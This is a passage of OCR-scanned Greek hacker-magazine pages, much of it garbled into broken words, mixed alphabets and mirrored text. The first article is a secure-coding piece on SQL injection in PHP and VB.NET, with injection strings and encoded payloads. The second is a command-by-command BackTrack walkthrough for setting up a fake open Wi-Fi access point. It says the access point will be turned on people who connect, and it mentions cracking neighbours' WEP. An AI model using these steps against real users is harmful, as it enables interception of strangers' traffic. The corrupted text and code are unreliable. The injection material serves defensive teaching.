anó επικἰνδυνους χαρακτήρες, ὁπως εἶναι η απὀστροφος. H διαδικασία 
καθαρισμού rov μµεταβλητὠν апо πονηρούς χαρακτήρες ονομάζεται 
sanitization. Θα πρέπει να φτιάξουμε λοιπὸν µια συνάρτηση που θα κάνει 
sanitize τις μεταβλητές του χρήστη *npiv* αυτὲς χρησιμοποιηθούν: 


2. Θα μπορούσαν να µην ἐρχονται апо το URL αλλά апо κάποιο πεδίο, κάποιας φόρμας. Σε κάθε περίπτωση 
πάντως δεν θα ἀλλαζε τίποτα στη συλλογιστικἠ μας! 
3. Me Tnv προῦπόθεση бт! ο πίνακας δ]ν users δεν εἶναι ἀδειος! 


Με τη βοήθεια του 
encode μπορούμε 
να κωδικοποιήἠ- 
coupe τη συμβο- 
λοσειρἁ που θα 
χρησιμοποιηθεί στο 
SQL Injection, µε 
πολλούς τρόπους. 
Μπορούμε yia па- 
ράδειγµα ν΄ αντικα- 
ταστήσουµε ὁλους 
τους χαρακτήρες 
µε την αντίστοιχη 
δεκαεξαδικἠ τιµή 

ἡ τον αντίστοιχο 
κώδικα ASCII... 


ommand Prompt 
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function Sanitized($Input) 


1 
return (get magic quotes gpc()) ? 
mysql real escape string(stripslashes($Input)) 
mysql real escape string($Input); 
} 


Н παραπάνω συνάρτηση βάζει την ανάποδη μπάρα "V. (nou ονομάζεται 
backslash) μπροστὰ anó καθέναν anó τους επόμενους χαρακτήρες \ 
x00, An, V, V", " καὶ \х1а. Ως αποτέλεσµα, καθένας апо αυτούς τους 
χαρακτήρες θα θεωρηθεί ότι ανήκει στην τρέχουσα μεταβλητή που θα 
χρησιμοποιηθεί κι Ох! бт! την οριοθετεὶ (όπως λανθασμένα συνέβη στο 
παράδειγμά µας, εξαιτίας της αποστρὀφου). Σημειώστε бт! η συνἀρτησἠ 
μας ελέγχει αρχικἁ αν έχουμε ενεργοποιημένα ra magic quotes. Πρό- 
κειται για µια λειτουργία της PHP που προσθέτει backslash οπουδήποτε 
κρίνει От! εἶναι απαραἰτητο, σε µια προσπάθεια να απομονώσει/απενερ- 
γοποιήσει τους πιθανὰ επικίνδυνους χαρακτήρες. Βέβαια η εν λόγω λει- 
тоорүіа πλέον θεωρεἰται ξεπερασμένη. Ακριβώς ү’ αυτό προτιμάμε va 
χρησιμοποιήσουμε στη θέση της την πιο σύγχρονη mysql. real escape — 
string. Έτσι, ο κὠδικάς µας ελέγχει av εἶναι ενεργοποιημένη η λειτουργία 
magic quotes και αν εἶναι επαναφέρει τη μεταβλητή στην αρχικἠ της 
κατάσταση, αφαιρώντας ra backslash. Αυτό επιτυγχάνεται µε τη βοήθεια 
της συνάρτησης stripslashes(). 


Ἐχοντας φτιάξει την παραπάνω συνάρτηση θα πρέπει у’ αλλάξουμε και 
τις πρὠτες γραμμὲς του προγρἀμματὸς µας. Συγκεκριµένα οἱ γραμμὲς 
//Get credentials from URL 
$user - $ GET["user"]; 
$password = $ GET["password"]; 
Θα πρέπει να γίνουν ως εξής: 
//Get credentials from URL 
$user = Sanitized($ СЕТ ["иѕег"]); 
$password = Sanitized($ СЕТ ["раѕѕмога"]); 
Πλέον, στην περίπτωση nou κάποιος πονηρὀς δώσει κάτι τέτοιο 
www.deltahacker.gr/Safe.php?user-admin&password-' OR 1-1 


δεν θα καταφέρει τίποτε! Н απόστροφος oro password θα ενσωματωθεὶ 
στο σχετικὀ string και δεν θα το τερματίσει. Με ἆλλα λόγια, η μεταβλητἠ 
$password θα πάρει την τιµή "V OR \1=1” (χωρὶς ra διπλά εισαγωγικὰ, 


.-1π| ΧΙ 


C:MtoolsPencode.exe -mx "' or 151" 


Encoded for HVSQL Injections: 
Original: ' or 151 


Y 
Encoded: 8x27286f 722827313431 


"3 


C:NtoolsPencode.exe -me ог 

Encoded for MYSQL Injections: 

Original: ' or 151 

Encoded: CHARC39,32.111.114.32.39,49,.61.49) 


C:stools? 


16 


Συγγραφή ασφαλούς κώδικα (Part 1 of 


ЕЛЕЕ ССС ССС 


φυσικὰ). Επομένως, n εντολἠ SQL που θα εκτελεστεὶ τελικἁ θα εἶναι η 
ακόλουθη: 
SELECT * FROM ajv users WHERE usr nick-'admin' AND usr pass-'V OR 
\'1=1' 
Ta backslash πριν anó τις αποστρόφους απενεργοποιούν τη λειτουργία 


τους (τον τερματισμό του string) κι αυτό το ερὠτημα προς τη βάση δεν 
θα επιστρέψει каша εγγραφή! 


SQL Injection και ASP.net 


Αντίστοιχα προβλήµατα δημιουργούνται και µε το περιβάλλον ανάπτυξης 
της μαμάς Micro$oft, το ASP.NET. Δείτε τον παρακάτω κὠδικα σε Visual 
Basic.NET, που μοιάζει va εἶναι εντάξει αλλά επιτρέπει και αυτὸς το SQL- 
Injection: 


Ὀρισμός μεταβλητών. 

Dim username, password, sql As String 

Dim SqlCommand As SqlCommand 

Dim reader As SqlDataReader 

Σύνδεση µε την βάση Δεδομένων MS SQL Server. 


DBConnection = New SqlConnection("Server-ServName;Database-Test 
DB; User Ір=0ѕег1; password-xyz") 


'Av o χρήστης δεν έχει δώσει username από то URL τότε επίστρεψε. 
If Request.QueryString('username") Is Nothing Then 

Return 
End If 
Βάζουμε τα credentials από то URL σε μεταβλητές. 
username = Request.QueryString("username").ToString 
password = Request.QueryString("password").ToString 
Δημιουργία και εκτέλεση εντολής SQL για έλεγχο του χρήστη. 
sql = "Select * from users where usr_name=" + username + _ 

" and usr passwordz" + password + "" 

SglCommand = New SqlCommand(sql, DBConnection) 
DBConnection.Open() 
reader = SqlCommand.ExecuteReader() 
If (reader.HasRows) Then 

Response.Write("Emnituxüg Εισαγωγή! <br /»") 
Else 

Response.Write("Aóvvagía Πρόσβασης! <br /»") 
End If 
reader.Close() 

4. Ἐκτὸς κι cv υπάρχει εγγραφή στην βάση, µε ὀνομα username το admin και password то «V OR V1-1». 


Σε αυτήν την περίπτωση βέβαια o επιτιθἐµενος δεν θα εἶναι μάγκας αλλά ΠΑΡΑ ΠΟΛΥ τυχερὀς, για va то πούμε 
κομψά ;) 
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To πρόβλημα pe rov παραπάνω κὠδικα βρίσκεται ακριβώς μετὰ το σχόλιο 
“Δημιουργία και εκτέλεση εντολἠς SQL...". Ας υποθέσουμε ὁτι ἑνας novn- 
ρὸς χρήστης δίνει το παρακάτω: 


www.deltahacker.gr/Safe.aspx?username-admin&password-' or 1-1-- 
Н εντολἠ nou θα εκτελεστεἰ τελικἀ στη βάση εἶναι η ακόλουθη: 


Select * from users where usr name-'admin' and usr password-" ог 
1=1--' 


Οι δύο παύλες nou ἐντεχνα φύτεψε o поупр©с χρήστης, σηματοδοτούν 
την έναρξη ενὸς σχολίου. Επομένως, η απὀστροφος που βρίσκεται αμέ- 
σως μετὰ τις παύλες αντιμετωπίζεται σαν σχόλιο. Έτσι, η εντολἠ SQL έχει 
απολύτως σωστή σύνταξη και o SQL Server θα την εκτελέσει µε μεγάλη 
του хара. Όπως καταλαβαίνετε ὅμως, η παράσταση "1-1" εἶναι πάντα 
αληθής. Ара και η ευρύτερη παράσταση "usr. password-" or 1-1" θα 
εἶναι επίσης πάντα αληθής! Πα να λύσουμε αυτό το πρόβλημα θα κάνουμε 
кат! παρόμοιο µε αυτό που κάναμε στην PHP. Θα φτιάξουμε µια συνάρτη- 
ση που θα φροντίζει να κόβει τους ὑπουλους χαρακτήρες. Ας τη δούμε. 


Private Function Sanitized(ByVal Input As String) As String 
Return Input.Replace("", "''") 
End Function 


Όπως βλέπετε, το μόνο που κάνει η συνάρτηση εἶναι va αντικαθιστἀ το 
μονό quote (`) µε δύο quotes (’’). Αυτό σημαίνει ὁτι αν κάποιος χρήστης 
δώσει μονό quote (`) σαν μέρος rou password, τότε αυτό θα αντικατα- 
σταθεἰ αυτόματα µε δύο роуа quotes (“). Αυτό µε τη ора του θα ἐχει 
σαν αποτέλεσμα το quote να θεωρηθεἰ μέρος της ἰδιας της συµβολοσει- 
рас και ὀχι χαρακτήρας τερματισμού. Το µόνο που πρέπει να αλλάξου- 
µε στον κὠδικά µας, λοιπὸν, εκτὸς anó το να εισάγουµε την παραπάνω 
συνάρτηση σε ша βολικἠ θέση, εἶναι να τροποποιήσουμε τις ακόλουθες 
γραμμές: 


Βάζουμε τα credentials από το URL σε μεταβλητές. 
username = Request.QueryString("username").ToString 


password - Request.QueryString("password").ToString 
Οι οποίες θα πρέπει να γίνουν κάπως ἑτσι: 


Βάζουμε τα credentials από το URL σε μεταβλητές. 
username = Sanitized(Request.QueryString("username").ToString) 


password = Sanitized(Request.QueryString("password").ToString) 


To πρὀγραμμµά µας ropa θα εἶναι περισσότερο асфаАёс. Βέβαια, πρέπει 
να σημειώσουμε бт! υπάρχει ¿vac ασφαλέστερος τρόπος για va npoora- 
τεύσετε TIG εντολὲς SQL στη VB.NET: Να χρησιμοποιήσουμε την τεχνικἠ 
που ονομάζεται “Parameterized Queries". Αυτή η τεχνική προβλέπει τη 
δηµιουργία µιας εντολἠς SQL, στην οποία oi μεταβλητὲς εισάγονται σαν 
παράμετροι µε τη βοήθεια µιας ειδικής συνάρτησης. Αξιοποιώντας την εν 
λόγω τεχνική, το παρἀδειγμὰ µας (χωρίς τις δηλώσεις των μεταβλητών) 
θα γραφόταν κάπως έτσι: 


Συγγραφή ασφαλούς κώδικα (Part 1 of 


P 


username = Request.QueryString("username").ToString 
password = Request.QueryString("password").ToString 


sql = "Select * from users where usr name = @рагат1 and usr 
password = ()param2" 


SglCommand = New SqlCommand(sql, DBConnection) 
Dim МуРагат1 = New SqlParameter("param1", SqlDbType.VarChar) 
Dim MyParam2 = New SqlParameter("param2", SqlDbType.VarChar) 
МуРагат1.Ма1ие = username 
SglCommand.Parameters.Add(MyParam1) 
MyParam2.Value - password 
SglCommand.Parameters.Add(MyParam2) 
Response.Write("Command: " + SqlCommand.CommandText + "<br /»") 
reader = SqlCommand.ExecuteReader() 
If (reader.HasRows) Then 

Response.Write("Passed! «br /»") 
Else 

Response.Write("Access Denied! <br /»") 
End If 
reader.Close() 


Εδώ οι μεταβλητές username kai password δεν φιλτράρονται апо τη συ- 
νάρτηση sanitized. Το καθάρισμα апо ύπουλους χαρακτήρες γίνεται au- 
тӧрата, апо τη συνάρτηση SgiCommand.Parameters.Add. 


Επίθεση SQL-Injection... αλλά encrypted! 


Па να σιγουρευτούμε бт! έχουμε ασφαλἰσει ικανοποιητικἁ TOV κὠδικά µας 
(εἰτε εἶναι γραμμένος σε PHP eire σε .NET) θα πρέπει να πραγματοποιἠ- 
σουµε την ἴδια επίθεση SQL injection που εἰδαμε προηγουμένως αλλά µε 
την πονηρἡ συμβολοσειρά (την ειδικἠ τιµή Tou password) σε κωδικοποι- 
ημένη µορφή. Ὅμως nog Ва το κάνουμε αυτό; Καταρχάς, θα μπορούσαμε 
να µετατρέψουμε ша σειρἁ χαρακτήρων σε 16δικήὴ μορφὴ ἡ va αντικα- 
ταστήσουµε ὁλους τους χαρακτήρες µε τον αντίστοιχο κὠδικα ASCII, 
χειροκίνητα. Κάτι τέτοιο όμως Ва ἦταν поло κουραστικὸ και ακόμα περισ- 
σὀτερο βαρετὀ. Ακριβώς ү’ αυτό θα χρησιμοποιήσουμε ἑνα ἐτοιμο npó- 
γραµµα (γνωστὀ στους κύκλους rou darknet), µε ro ὀνομα encode.exe. 
To πρὀγραμμα δημιουργεί κωδικοποιημένες συμβολοσειρές για χρήση σε 
server MySQL, MS-SQL к.а. Εμεἰς, µε тп βοήθεια rou εν λόγω εργαλείου, 
δοκιμάσαμε τις ύπουλες συμβολοσειρὲς που εἶδαμε παραπάνω και διαπι- 
στώσαμε бт! δεν εἶναι ικανὲς va ξεγελἁάσουν τα προγρἀμματὰ µας. Σας 
παροτρύνουµε να το δοκιμάσετε και μόνοι σας, προσπαθώντας να βρείτε 
και νέες τρύπες yia SQL Injection! 


Συμπεράσματα... 


Eire αναπτύσσετε τα δικἁ σας προγράµµατα EITE χρησιµοποιείτε αυτ 
κάποια Open Source gite τα τροποποιείτε, πρέπει va θυμόσαστε 
αδυναμία SQL-Injection υποβόσκει σχεδόν πάντα και παντού! Εξακολ 
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θεἰ ἄλλωστε να βρίσκεται στο top 5 rov επιθέσεων παγκοσμίως, τόσο σε 
συχνότητα боо και σε βαθμὸ επικινδυνότητας. О στὀχος µας δεν εἶναι να 
κάνουμε τα проүраррата µας 100% апорӨпта. Αυτό δεν υπάρχει! Πρέπει 
να έχουμε πάντα υπόψη µας πως ὁπι κλειδώνει, ξέρετε, ξεκλειδώνει. Н 
προστασία rou κὠδικα αποτελεἰ ша δυναμική διαδικασία, που δεν σταµα- 
тае! ποτὲ κι απαιτεἰ να εἰμαστε πάντα προσεκτικοὶ και ενήμεροι. О στόχος 
μας εἶναι να κάνουµε τη δουλειά του επιτιθἐµενου апо πολύ δύσκολη, 
έως εξαιρετικἁ δύσκολη! 


Н μέθοδος προστασίας nou παρουσιάσαµε μπορεί να χρησιμοποιηθεί ys- 
νικά, σε κάθε μεταβλητή που εισάγεται апо τον χρήστη ἡ, πιο σωστά, που 
προέρχεται апо τον client. Ωστόσο δεν θα πρέπει να θεωρηθεί πανάκεια! 
Σας προτείνουμε va τη μελετήσετε και να προσπαθήσετε να βρείτε αν 
αντέχει σε ὀλες TIG γνωστές μορφές επίθεσης SQL Injection. Μπορείτε να 
χρησιμοποιήσετε ἑνα соро ἑτοιμα εργαλεἰα για αυτόν το σκοπὀ, ónog για 
παράδειγμα ro add-on rou Firefox που ακούει στο ὀνομα SQL Inject Me 
add. Μην ξεχνάτε ὁτι κάθε φορά nou βγαίνει στον аёра ша νέα τεχνικἠ 
επίθεσης, θα πρέπει να τροποποιούµε και γενικότερα va προσαρµόζουµε 
TOV κὠδικα µας ανάλογα. Κάτι τέτοιο δεν εἶναι εὐκολο, οὐτε γίνεται γρή- 
yopa. Σκεφτείτε επίσης ὁτι όλη αυτήν την ώρα μελετούσαμε τον κἰνδυνο 
µιας επίθεσης µε SQL Injection και μόνο! Υπάρχουν πολλὲς ακόμα aðu- 
ναμίες, ro ἰδιο ἡ περισσότερο επικίνδυνες και βρίσκονται σε απόσταση 
αναπνοής. Μείνετε συντονισμένοι... ;) 


Εσείς τι δικαιολογία έχετε που η διαφήμισή σας απουσιάζει από εδώ; 


Τολμήστε va µας τη στείλετε στο talk2usQgdeltahacker.gr. Όπως και va ’χει θα 
επικοινωνίσουµε κι εμείς μαζί σας (*) - ή έστω µε τον ανταγωνιστή σας ;) 


"ολ1οπφ *eSurJ4j 
ої 10} Коләці Зиея Srg әці oi i0» 130300 Aminp 
зз 500vvOu 37 'Ὁό311001 50 500i UaioiAoyoun ^oi 
лпаоизүў ^39 nou 5noumdgao 50o»xiAdaoindUug *5noXaoUu^o 
01] -3isd3: *Зитуәец теотцзә o1Aoyoanrdsg зп 
noxigoidau ΠΟΧ1ΛΟΥΟΛΧ314 подзіпуох noi Ὀλλοποιήμο 
из 3H i0o43dUyoXoowo  3iopdi3  ^odou о 500! 
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PN Δημιουργία ενός 
too-good-to-be-true 
Access Point! 


bu, subzrau. 


Ἐχουμε τονίσει επανειλημμένα nóoo επικἰνδυνα 
εἶναι τα ελεύθερα ασύρματα δἰκτυα. Φυσικά, δεν 
εἷμαστε oi μόνοι που το φωνάζουμε. Πείτε όμως την 
αλήθεια: Πότε βρήκατε ελεύθερο access point και 
δεν συνδεθήκατε, ἔστω και για λίγο; 


μα 
-- 
[ή 
.--. 


кин 
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H Alfa AWUSO36H 
εἶναι µια µικρή, xa- 
ριτωμένη και πολύ 
ενδιαφἑἐρουσα Kap- 
τούλα ασύρματης 
δικτύωσης, εξαιρε- 
TIK δημοφιλἠς σε 
όσους ασχολούνται 
με ro wardriving. 
Αλλά µη qavra- 
στείτε, δεν εἶναι 
χρήσιμη μόνο γι΄ 
αυτὀ. О συγκεκρι- 
μένος USB wireless 
adapter εἶναι 
κάπως δυσεύρετος 
στη χώρα µας, av 
όµως πιστεύετε 

ότι πρέπει να TOV 
έχετε 0a rov βρείτε 
σχετικά εὐκολα. 
Εμείς κάναμε 
παραγγελία απὀ το 
γερμανικὀ Amazon 
(http://amzn.to/ 
AWUSO36H). Χάρη 
στη σύμβουλο 
έκδοσης TOU περιο- 
δικού, μάλιστα, δεν 
χρειάστηκε καν να 
καταφύγουμε στο 
Google Translate 
:D 
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Кака ra ψέμματα. Όση προσοχἠ και va δίνουμε στη θεωρία, ὁσο κι av 
σεβόμαστε τη γνώμη και τις γνώσεις των ανθρώπων που µας συµβου- 
λεύουν, αν δεν δούμε кат! να συμβαίνει στην πράξη δυσκολευόμαστε να 
πάρουμε στα σοβαρὰ ὁσα διαβάζουμε ἡ óoa µας προειδοποιούν. Enava- 
λαμβάνουμε: Δεν ἐχει να κάνει µε το πόσο ἐγκυρη θεωρούμε την πηγὴ ἡ 
τον άνθρωπο που έχουμε an£vavri µας. Απλά, απ’ ό,τι φαίνεται υπάρχει 
µια πλευρά του χαρακτήρα των ανθρώπων nou της αρέσει να υπολογίζει 
πιθανότητες. Σε πολλὲς περιπτώσεις, λοιπὸν, η ἴδια πλευρὰ του xapa- 
κτήρα καταλήγει στο συμπέρασμα Ori, εντάξει, δεν υπάρχει λόγος va 
τρελαινόμαστε, ας κάνουμε αυτό που θέλουμε και, τι στο кало, όλα кала 
θα πάνε. Εξάλλου οι ατυχἰες συμβαίνουν στους ἄλλους, ἐτσι δεν εἶναι; 


Πράγματι, μερικὲς φορὲς ἐτσι εἶναι. Κάποιες ἄλλες φορὲς ὁμως δεν εἶναι. 
Εξάλλου θα ἦταν αδύνατον οι атиҳієс va µη συμβαΐνουν σε κανέναν пара 
µόνο στους άλλους. Σε κἀποιους πράγματι συμβαίνουν, δεν γἰνεται δια- 
Φορετικἀ. Στην περίπτωση των ελεύθερων, ασύρματων δικτύων που OU- 
ζητάμε, ποια εἶναι άραγε η πιθανότητα να µας συμβεἰ кат! δυσάρεστο; Na 
σας πούμε την αλήθεια, δεν έχουμε ιδέα. Αλλά ξέρετε κἀτι; Δεν θέλουμε 
va ρισκάρουµε να υπολογίσουμε πιθανότητες. Αντιθέτως, auró nou θα 
κάνουμε στο παρὸν ἀρθρο εἰναι va στήσουμε ёха fake access point, το 
οποίο θα μοιράζει απλὀχερα ἱντερνετ στη γειτονιά. Αφού το στήσουμε, 
στο άρθρο που ξεκινά апо τη σελίδα 92 θα δούμε μερικἁ μόνο апо τα 
πράγματα που μπορούμε να κάνουμε ос’ ὁσους συνδέονται с’ αυτὸ το 
ασύρματο δίκτυο, πιστεύοντας ἰσως ὁτι τους “фе” και μᾶλλον αξίζει να 
διακόψουν το συμβόλαιο που έχουν µε τον ISP τους! Τραβηγμένο, алла 
καταλαβαίνετε τι θέλουμε να πούμε. Καταλαβαίνετε επἰσης και πού то 
πάμε. ΟΚ. Auró το τελευταίο δεν εἶχε και πολύ νόημα. Αλλά ας περάσου- 
ue στην πρἀξη. Υποσχόμαστε бт! ἐτσι θα βγει νόημα |) 


ALFA 
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802.1 b/g Long-Range USB Adapter 
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To σκηνικὀ και µια προειδοποίηση 


Σκοπὸς µας εἶναι va στήσουμε ¿va ελεύθερο ασύρματο σηµείο πρὀσβασης, 
στο onoio καθένας θα μπορεἰ να συνδέεται και να σερφἀρει αμέριμνα. Ως 
λειτουργικὀ σύστημα για την εργασία µας επιλέγουμε ro BackTrack Linux 
5 R1. О υπολογιστής βγαἰνει στο ἵντερνετ µέσω κάποιας ενσύρματης ἡ 
ασύρματης σύνδεσης - праүратіка δεν έχει σημασία. Н ιντερνετικἠ σύν- 
δεση μοιράζεται στους wireless clients µέσω µιας συγκεκριμένης κάρτας 
ασύρματης δικτύωσης, την οποία ro λειτουργικὀ χρησιμοποιεί αποκλει- 
στικἁ γι’ αυτόν το σκοπὀ. Н карта µε την οποία δουλεύουμε στο napóv 
κείμενο εἶναι η Alfa AWUSO36H. Πρόκειται yia ἑναν USB wireless adapter 
µε τρομερά καλὴ φήμη ócov αφορά oro wardriving. Εἶναι αρκετά οικο- 
νομικὸς kai μπορείτε va τον προμηθευτείτε апо διάφορους vendors στο 
Internet ἡ апо ro eBay. О γράφων kave παραγγελἰα απὀ το γερμανικὀ 
Amazon και το URL του προϊόντος εἶναι 


http://amzn.to/AWUS036H 


Тора, av δεν ἐχετε ro BackTrack εγκατεστημένο σε κάποιο laptop ἡ 
desktop PC και δεν σας βολεύει να το βάλετε μόνο και μόνο γι’ αυτό 
το άρθρο, µπορείτε να το εγκαταστήσετε σε virtual machine. Σ΄ αυτἠ 
την περίπτωση -και µε την προὐπόθεση ὁτι θα χρησιμοποιήσετε την Alfa 
AWUSO36H ἡ κάποιον wireless adapter µε то RTL8187 chipset-, nporei- 
νουµε va καταφύγετε στο δωρεὰν VirtualBox κι ὀχι σε κἄποια εκδοχἠ του 
εμπορικού VMware. О λόγος ἐχει να κάνει µε τον driver του BackTrack για 
το συγκεκριµένο chipset: Εξαιτίας ενός ὑπουλου bug που εκδηλώνεται σε 
περιβάλλον VMware, η συσκευἠ εἶναι πιθανὀ va µη λειτουργεί σωστά ἡ 
και καθόλου. Ακόμη κι αν ακολουθήσετε τις οδηγἰες που περιγράφονται 
αναλυτικἀ, π.χ., στα 


www.backtrack-linux.org/wiki/index.php/Wireless Drivers 
ка! 
www.backtrack-linux.org/wiki/index.php/Rtl18187 vs r8187 


κι αναβαθµίσετε τους wireless drivers rou BackTrack, η επιτυχία δεν εἶναι 
εγγυημένη. 


Συμπερασματικά, αν ἐχετε την Alfa AWUSO36H ἡ κάποια ἄλλη ασύρματη 
συσκευἠ ре то RTL8187 chipset και θέλετε va δουλέψετε σε EIKOVIKÓ NE- 
ριβάλλον, προτιμήστε ro VirtualBox. 


Ὅσα ακολουθούν στη συνέχεια ra εφαρμόσαμε σε περιβάλλον VirtualBox, 
ἐκδοση 4.1.6. To host OS ἦταν ra Windows 7 Premium 5Ρ1 64bit και το 
guest OS ro BackTrack 5R1 32bit. 


Σηµείωση. Av θέλετε va δουλέψετε σε εικονικὀ περιβάλλον αλλά δεν 
έχετε πεῖρα µε ro virtualization γενικότερα και ro VirtualBox ειδικότερα, 
κάντε εδώ µια παράκαμψη και διαβάστε το оҳетіко µας άρθρο στο 


http://deltahacker.gr/?p-2667 


Ρύθμιση Tou wireless adapter 


Ξεκινάμε то BackTrack ki αφού φορτώσει σηκώνουμε ro περιβάλλον ypa- 
Φφικών, ανοίγουμε ¿va παράθυρο τερματικού και δίνουμε 


root@bt:~# ifconfig 
еһе Link encap:Ethernet HWaddr 08:00 :27:83:с6:а4 
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inet addr:10.20.30.109 Bcast:10.20.30.255 
Mask:255.255.255.0 


inet6 addr: fe80::a00:27ff:fe83:c6a4/64 Scope:Link 

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:79 errors:0 dropped:0 overruns:0 frame:0 
TX packets:28 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 

RX bytes:17858 (17.8 KB) TX bytes:2408 (2.4 KB) 


Όπως βλέπετε, στο παράδειγμά µας ro BackTrack βγαϊνει online ενσύρ- 
рата και το αντίστοιχο network interface εἶναι το ethO. To IP που ἐχει 
πάρει апо τον οικιακὀ ADSL router εἶναι 10.20.30.109. Συνδέουμε тора 
την εξωτερική, ασύρματη καρτούλα δικτύωσης στον host computer αλλά 
τη δίνουμε στο BackTrack VM. Αυτό γίνεται µε διάφορους τρόπους. Εμείς, 
n.X., αφού τη συνδἐσαµε σε µια ελεύθερη USB θύρα του host, апо την 
πάνω οριζὀντια μπάρα του παραθύρου rou VirtualBox μέσα στο οποίο 
ἐτρεχε ro BackTrack επιλέξαμε 


Devices --> USB Devices --» Manufacturer Realtek ΕΤΙΘ81Ι87 _ 
RTL8187 Wireless [0100] 


Αν о wireless USB adapter ἐχει αντιστοιχιστεἰ επιτυχώς στο VM, τότε 
δίνοντας ξανὰ την εντολή ifconfig θα δείτε και το δικὀ του network 
interface (εἶναι το wlanO): 


root@bt:~# ifconfig 


wlane Link encap:Ethernet HWaddr 00:pp:qq:rr:ss:tt 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
АХ packets:0 errors:0 ἀγορρεά:θ overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 саггіег:@ 
collisions:0 txqueuelen:1000 
RX bytes:0 (0.0 B) TX Όντες:θ (0.0 B) 


Αν δεν το δείτε, βγάλτε το καλώδιο USB апо rov host computer, βάλτε το 
σε ша ἄλλη θύρα και δώστε ξανὰ τη συσκευἠ ото VM. Ένας ἀλλος τρόπος 
για να βεβαιωθείτε óri то BackTrack βλέπει τον wireless adapter εἶναι va 
τρέξετε το προγραμματάκι iwconfig (εἶναι παρόμοιο µε το ifconfig, αλλά 
επικεντρώὠνει στα Wireless interfaces): 


root@bt:~# iwconfig 


lo no wireless extensions. 
еһе no wireless extensions. 
wlane IEEE 802.11bg ESSID:off/any 


Mode:Managed Access Point: Not-Associated Tx- 
Power-20 dBm 


Retry long limit:7 RTS thr:off | Fragment thr:off 
Encryption key:off 


Power Management :off 


Δημιουργία ενός too-good-to-be-true Rccess Point! 
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Πολὺ ωραία, ro BackTrack βλέπει την карта. Συμφωνεἰ και то σκριπτάκι 
airmon-ng: 

root@bt:~# airmon-ng 

Interface Chipset Driver 

wlane Realtek RTL8187Lrt18187 - [ρῃγθ] 
To script αυτό θα βάλει την ασύρματη карта σε monitor mode (http:// 
en.wikipedia.org/wiki/Monitor mode): 

root@bt:~# airmon-ng start м1апе 

Found 2 processes that could cause trouble. 

If airodump-ng, aireplay-ng or airtun-ng stops working after 

a short period of time, you may want to kill (some of) them! 

PID Name 

662 dhclient3 

1544 dhclient3 

Process with PID 1544 (dhclient3) is running on interface wlan 

Interface Chipset Driver 

wlane Realtek RTL8187Lrt18187 - [ρῃγθ] 


(monitor mode enabled on mon?) 


Ὅπως βλέπετε η карта μπήκε oe monitor mode αλλά πήραμε και ша npo- 
ειδοποίηση. О DHCP client του BackTrack ελέγχει και το wlanO κι αυτό σε 
λίγο εἶναι niGavó να προκαλέσει προβλήματα. Πράγματι, δεν σκοπεύουμε 
να χρησιμοποιήσουμε την ασύρματη карта για να συνδεθούμε σε κἄποιο 
δίκτυο αλλά yia να συνδεθούν ἆλλοι στο δικὀ µας. Κανένα πρὀβλημα, 
τερµατίζουµε το process του DHCP client που δεν θέλουμε και εἱμαστε 
μια χαρά: 

root@bt:~# kill 1544 

root@bt:~# ps aux | grep dhclient 

root 662 0.0 0.0 2284 248 ? Ss 14:52 0:00 

dhclient3 -e IF METRIC-100 -pf /var/run/dhclient.ethO.pid -1f / 

var/lib/dhcp3/dhclient.ethO0.leases еһе 

root 2599 0.0 0.0 3376 744 pts/0O S+ 15:05 0:00 grep 

--color-auto dhclient 


To airmon-ng ἐχει φτιάξει ἑνα νέο network interface, то топо, ro οποίο 
εἶναι σε monitor mode: 


root@bt:~# airmon-ng 


Interface Chipset Driver 

wlane Realtek RTL8187Lrt18187 - [phy] 
mone Realtek RTL8187Lrt18187 - [ρῃγθ] 
root@bt:~# iwconfig 

lo no wireless extensions. 

еһе no wireless extensions. 

wlane IEEE 802.11bg  ESSID:off/any 


Mode:Managed Access Point: Not-Associated Tx- 
Power-20 dBm 


2В 


УУ НА@КЕК 


ККК ы 


Retry long limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 


Power Management :off 


mone IEEE 802.11bg Mode:Monitor  Tx-Power-20 dBm 
Retry long limit:7 RTS thr:off Fragment thr:off 


Power Management : оп 


root@bt:~# ifconfig 
еһе Link encap:Ethernet  HWaddr 08:00:27:83:c6:a4 


inet addr:10.20.30.109 Bcast:10.20.30.255 
Mask:255.255.255.0 


inet6 addr: fe80::200:27ff:fe83:c6a4/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
АХ packets:8190 errors:0 dropped:0 overruns:0 frame:0 


TX packets:6037 errors:0 dropped:0 overruns:0 
carrier:0 


collisions:0 txqueuelen:1000 


RX bytes:10192703 (10.1 MB) TX bytes:581729 (581.7 
KB) 


топе Link encap:UNSPEC MHWaddr 00-C0-CA-52- 
AB-B4-30-30-00-00-00-00-00-00-00-00 


UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
АХ packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 еггогѕ:0 dropped:0 overruns:0 carrier:O 
со111ѕіопѕ:0 txqueuelen:1000 
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 
Σημειώστε εδὠ бт! апо τη στιγμὴ nou ἐχουμε éva network interface σε 
monitor mode μπορούμε να κάνουµε πολλά ενδιαφέροντα πράγματα, 
όπως, n.x., να συλλέξουμε packets yia να σπάσουµε την προστασία WEP 
ἄλλων ασύρματων δικτύων της περιοχής. Όμως ας µην ξεφεύγουμε апо 
το σκοπὀ µας, nou εἶναι η δηµιουργία ενὸς ανοικτού ασύρματου δικτύου. 
To access point µας ενεργοποιείται µε το πρὀγραμμα airbase-ng: 
root@bt:~# airbase-ng -e '"deltaWiFi" -c 5 -v топе 
19:21:56 Created tap interface ate 
19:21:56 Trying to set МТО on а+е to 1500 
19:21:56 Access Point with BSSID 00:C0:CA:52:AB:B4 started. 
Μόλις δημιουργήσαμε, πάνω anó ro πιοπῦ, ¿va v£o wireless access point 
που εκπέμπει στο κανάλι 5 (παράμετρος -с) κι ἐχει ὀνομα deltaWiFi (na- 
ράμετρος -е). Το νέο network interface που του αντιστοιχεί εἶναι το atO. 
AUT τη στιγμή, στο παράθυρο τερματικού апо το οποίο δώσατε την na- 
ραπάνω εντολή πιθανώς θα βλέπετε éva σωρὸ μηνύματα για broadcast 


probe requests, τα οποία προέρχονται апо υπολογιστές, laptops και 
